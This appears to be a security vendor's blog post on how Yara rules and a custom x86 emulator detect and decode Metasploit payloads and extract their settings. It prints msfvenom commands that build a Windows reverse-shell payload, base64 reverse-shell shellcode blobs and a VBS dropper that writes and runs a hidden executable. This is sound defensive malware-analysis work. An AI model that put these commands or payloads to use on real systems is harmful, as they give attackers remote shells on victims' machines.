Analyzing Metasploit Payloads

Blog.

Analyzing Metasploit Payloads

Introduction

Metasploit is a framework that aids penetration testers in their work. It has an enormous database of known exploits one can use to break into a system. Though the framework is meant to be used by ethical hackers a lot of malware out there use it for malicious purposes.

Attackers can make use of Metasploit in numerous ways, as its pre-built modules can automate a lot of the more complex aspects of malware. For example you can use it to set up a server listening for incoming connections - Metasploit handles all the sessions that come in through those listeners and the only thing the attacker is left to do is spreading malware that initiates that connection. This isn’t hard to do either, the framework is capable of generating VBS scripts, executables, PowerShell scripts, DLLs, ELFs and more. Sending someone a word document with an embedded VBS script and getting them to execute it is usually enough to receive a session, assuming your antivirus doesn’t pick up on it.

Detecting Metasploit

The detection of a metasploit payload isn’t all that difficult - if you were to create a payload with msfvenom say: msfvenom LHOST=192.168.10.10 LPORT=1337 --payload windows/shell/reverse_tcp --platform windows --arch x86 you’d get the same result everytime. This allows you to write a simple Yara rule for this particular payload and extract its configuration Unfortunately this is not the only way to generate a payload. Metasploit has encoders which you can use to obfuscate your shellcode. They pack your payload into a self-decrypting blob of shellcode which becomes the original one in-memory.

These are harder to detect, they’re never the same generation as the decryption key is chosen at random. One of the most used encoders is Shikata Ga Nai, which uses a randomly generated key to XOR the instructions. The result is then also used to alter the key, making it harder to statically analyze. Detecting these encoders is not hard, they all have a certain structure and certain CPU instruction which aren’t obfuscated. This means that also the encoders are detectable by using Yara rules. The real challenge after that is decoding the payload into a form that we can analyse further.

Our answer to this problem was building an emulator capable of running x86 instructions. This way we’re able to detect an encoder (which one it is doesn’t really matter) and run that through the emulator. Once we detect it starts executing memory it has written to we know that the decoder finished running and we have the fully decoded payload ready.

The X86 Emulator

We’ve built a software implementation of the X86 instruction set, much like how an emulator works for old consoles or computers. The only thing standing out here is that we’ve build an X86 emulator to run on X86 hardware. The reason for that is security, we have potential malware that we want to analyze “statically” so having a controlled environment is a must. We don’t want any of this code to actually run on the processor outside our sandbox environments.

So an X86 emulator, huh? That’s impressive, but can it run Crysis? Well no, the X86 instruction set has over 1500 (the actual number is a discussion on its own which I won’t get into) instructions. It would be too much of an effort to implement all those. Especially when the encoders we try to emulate use a very small subset of those instructions. So after implementing the first version of our emulator, we started generating different encoders and we kept adding instructions to the emulator until we got back our expected payload.

I hinted to it above already but why not just run it in the sandbox environment and be done with it? That’s because we also want to be able to analyze payloads statically. A piece of malware might drop a payload that for some unknown reason can’t be executed. Or it sleeps for a long time until it executes the payload which exceeds the duration of our analyses. There are a lot of scenarios to come up with that leaves us with the payload but without the execution and that’s where our emulator kicks in. We first try to detect possible shellcode through Yara rules, if we find something we’ll emulate it. When the shellcode jumps back into memory it has already been through we assume it’s done with its decoding process and dump the part of the memory the decoder has written to. That piece of shellcode is then run through our analysis process again to see if we need another round of emulation or to extract its configuration.

Extracting Metasploit Payloads

For example if we had clean shellcode generated by the up above we’d be able to extract the following information:

[
  {
    "dumped_file": "revtcp86clean.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
        "192.168.10.10:1337"
      ],
      "version": "windows/reverse_tcp"
    }
  }
]

However, if a payload is encoded by Shikata Ga Nai for example by running the following command: msfvenom LHOST=192.168.10.10 LPORT=1337 --payload windows/shell/reverse_tcp --platform windows --arch x86 --encoder x86/shikata_ga_nai

we first need to run the sample through our emulator revealing the shellcode it’s supposed to execute:

[
  {
    "dumped_file": "revtcp86shik.pl",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "version": "encoder/shikata_ga_nai",
      "shellcode": [
        "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAoKaAIABTmJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U="
      ]
    }
  },
  {
    "dumped_file": "revtcp86shik.pl",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
        "192.168.10.10:1337"
      ],
      "version": "windows/reverse_tcp"
    }
  }
]

As you can see our Yara rules first detect the Shikata Ga Nai encoder, then automatically runs the payload through our emulator revealing the shellcode. That shellcode is then run through the same process of detection to end up with a decoded and classified windows/reverse_tcp detection.

We’re also able to detect multiple layers of encoding, for example we can run the same payload through shikata 2 times and then another time through the call4_dword_xor encoder.

[
  {
    "dumped_file": "revtcp86shikdouble-call4.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "version": "encoder/call4_dword_xor",
      "shellcode": [
        "29bZdCT0v+dZH1JYM8mxXYPo/DF4EwOfSv2nhqLYPBzJg5eVgGJTwsDiAD1f68X9WwiSDqKTfeOi8iHgRd1nNL1hafwnojWUBajNn7ywRhNdwB7m0GyGNSb3ASmp5EqYlOnCOBCijjtky6WYL8IPtdvs0mkul7IMHzQLpPRXZ2AMxFIB+tdFP+DKKafSnUUMozYFFPE3uVjXn2fpxR+OtEUr3mcXMxS6c1z0EBtY/6VYuqdOtJ7tNFvgotycb1j4By969GqH1DKHdSvQPdfM399pBFzBxnLRKlAP9m7AopDko8Rkm6t2FDdeVVaedTBdrjOPOvCbiqdALDtDT0NLFAg/K8PYc81jk9YLLFXzuXecV8RbtHs2bVCeLb8XuHOmDpvsNaYAsKvZkyZ1os/Jn1i0jLmfQQCjyr91noS1K0qZVWYQbrZUBKG6dZ+4q288GOM8Cb0FoAaIhBX7jSnlOPZQg/UUcvzjFaM6QSpj3uBExApMOLREN6t7IaOMcNMQlDshyLlevYQwazIA",
        "4vU=",
        "2c/ZdCT0WCvJsVa75yNoozFYGIPABANY88GdXxOHXqDj6NdF0iiDDkSZx0NoUoV3+xYCd0ycdLZNjUXZzcyZOewe7DgpQh1o4giwnYdFCRXbSAnKq2s4XaA1ml9lTpNHamtt81gHbNWR6MMYHhsdXJjEaJTbeWtjpqX+cAAtWF2x4j8WvU9LcKFOmArd2x/dVJ87+T17JVibKlq6RJL+sGjHcpvkJL8k9CLIV8btYvBqZa0H+2FO10PhsNizK3eM40NerWiUX3gEnvdDcJQNLIKpFJULT0a1W8AnZRuwz2+U7/CPf5ibfynwMxlwiqLmr/blbUUGq4UsFNzxzuQdlM6OGT6ZJiBn7ejbQm7uJBNGhBOB5vJbReYCCg/mauprtY/1oaoDYEqa8CMiIC4D7dsFF+oj2zBTSyMBY4tJgTPjhq68w2dllUvt6Ffq8iA5svPH4kWJqBWmbqFxp27Nh5S49P3beEMNbtzihJBy9Iw=",
        "4vU=",
        "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAoKaAIABTmJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U="
      ]
    }
  },
  {
    "dumped_file": "revtcp86shikdouble-call4.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
        "192.168.10.10:1337"
      ],
      "version": "windows/reverse_tcp"
    }
  }
]

As you see here we went through 3 iterations of emulation before reaching the eventual payload!

Analyzing Different Formats

So until now we’ve only been looking at raw binary files. These are nice to test with but you only ever see them used in the wild when they’re part of a buffer overflow. Since you can’t normally execute raw binary data the Metasploit framework offers a some wrappers around these payloads. The most straightforward wrapper is the .exe one. It creates a PE file with the payload embedded. This can then be executed by the operating system. More interesting is, for example, the VBS format.

When telling msfvenom we want a VBS script we’re presented with the following output:

Function HcGfeiml(IaptHACouEAi)
        iUPNjPkzUe = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
                "dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
                IaptHACouEAi & "</B64DECODE>"
        Set eczxPPClnXDCTA = CreateObject("MSXML2.DOMDocument.3.0")
        eczxPPClnXDCTA.LoadXML(iUPNjPkzUe)
        HcGfeiml = eczxPPClnXDCTA.selectsinglenode("B64DECODE").nodeTypedValue
        set eczxPPClnXDCTA = nothing
End Function

Function FZkulPlmtVbzDXN()
        aqbOmTnrjomNtbH = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAA....
        Dim VOBINYgrlwlXqiv
        Set VOBINYgrlwlXqiv = CreateObject("Scripting.FileSystemObject")
        Dim aWkaYXFosJ
        Dim ksOGlPgDlLhsQ
        Set aWkaYXFosJ = VOBINYgrlwlXqiv.GetSpecialFolder(2)
        ksOGlPgDlLhsQ = aWkaYXFosJ & "\" & VOBINYgrlwlXqiv.GetTempName()
        VOBINYgrlwlXqiv.CreateFolder(ksOGlPgDlLhsQ)
        NrOucMgKFeZaCbq = ksOGlPgDlLhsQ & "\" & "dyYwENHdDhEITk.exe"
        Dim XnQUJbgAv
        Set XnQUJbgAv = CreateObject("Wscript.Shell")
        eRvqQOddkXwnQ = HcGfeiml(aqbOmTnrjomNtbH)
        Set lCIOzbmX = CreateObject("ADODB.Stream")
        lCIOzbmX.Type = 1
        lCIOzbmX.Open
        lCIOzbmX.Write eRvqQOddkXwnQ
        lCIOzbmX.SaveToFile NrOucMgKFeZaCbq, 2
        XnQUJbgAv.run NrOucMgKFeZaCbq, 0, true
        VOBINYgrlwlXqiv.DeleteFile(NrOucMgKFeZaCbq)
        VOBINYgrlwlXqiv.DeleteFolder(ksOGlPgDlLhsQ)
End Function

FZkulPlmtVbzDXN

I’ve truncated the base64 string but as we can see from its starting characters, we’re dealing with a PE executable here. The lines after that are directions to dump and run that executable.

The code below creates a random temporary folder in which to store the payload.

Set VOBINYgrlwlXqiv = CreateObject("Scripting.FileSystemObject")
...
Set aWkaYXFosJ = VOBINYgrlwlXqiv.GetSpecialFolder(2)
ksOGlPgDlLhsQ = aWkaYXFosJ & "\" & VOBINYgrlwlXqiv.GetTempName()
VOBINYgrlwlXqiv.CreateFolder(ksOGlPgDlLhsQ)
NrOucMgKFeZaCbq = ksOGlPgDlLhsQ & "\" & "dyYwENHdDhEITk.exe"

After that the top function is run to decode the base64 string eRvqQOddkXwnQ = HcGfeiml(aqbOmTnrjomNtbH)

When decoded the script dumps the payload to disk and runs its payload.

Set lCIOzbmX = CreateObject("ADODB.Stream")
lCIOzbmX.Type = 1
lCIOzbmX.Open
lCIOzbmX.Write eRvqQOddkXwnQ
lCIOzbmX.SaveToFile NrOucMgKFeZaCbq, 2
XnQUJbgAv.run NrOucMgKFeZaCbq, 0, true

And to be nice and clean the created file and directory are deleted afterwards

VOBINYgrlwlXqiv.DeleteFile(NrOucMgKFeZaCbq)
VOBINYgrlwlXqiv.DeleteFolder(ksOGlPgDlLhsQ)

This is basically how every format is constructed, the shellcode is wrapped into an executable this executable is then embedded into a script (VBS, Python, Ruby, etc.) which dumps it to disk and executes it.

Conclusion

We’ve been putting a lot of time and effort into static analysis and the extraction of malware configurations. By understanding the way Metasploit encoders work we’ve been able to detect them, strip them of their encoding, and provide their configuration even if they weren’t able to run in a dynamic environment.

You may also like: